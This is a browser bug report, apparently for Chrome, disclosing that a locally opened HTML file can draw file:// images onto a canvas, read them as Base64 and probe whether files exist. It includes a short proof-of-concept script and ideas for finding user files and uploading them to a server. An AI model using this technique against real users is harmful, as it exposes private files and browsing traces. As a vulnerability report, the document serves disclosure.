UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0

Steps to reproduce the problem:
You can get the Base64 of an Image:
<img id="preview">
<canvas id="myCanvas">
<script>
var img = document.getElementById("img");
img.src = "file:///home/david/Firefox_wallpaper.png";
var c = document.getElementById("canvas");
var ctx = c.getContext("2d");
ctx.drawImage(img, 10, 10);
alert(c.toDataURL());
</script>

You would need to specify a full file Url.
But you get grab the user url with window.location ans split. With that information you can then get the wall paper/user windows profile icon. Or try to check for common thinks as Dropbox/DCIM/001.png.
With this trick you can also check if file exists so you can check what programs are installed. Maby on what sites the user were (check if browser cache file exists).

You could now upload the Base64 to a server.
But still if i open a html file i would not expect that it can do such stuff...

What is the expected behavior?

What went wrong?
You can upload Images/check what programs are installed etc.

Did this work before? No 

Chrome version: Google Chrome	69.0.3497.92 (Official Build) (64-bit) Revision	eb2c6d16bcb960cc5c322243c1771713460c4bcf-refs/branch-heads/3497@{#921} OS	Linux JavaScript	V8 6.9.427.22 Flash	30.0.0.154 /home/david/.config/google-chrome/PepperFlash/30.0.0.154/libpepflashplayer.so User Agent	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Command Line	/usr/bin/google-chrome-stable --flag-switches-begin --flag-switches-end Executable Path	/opt/google/chrome/google-chrome Profile Path	/home/david/.config/google-chrome/Default  Channel: stable
OS Version: 
Flash Version: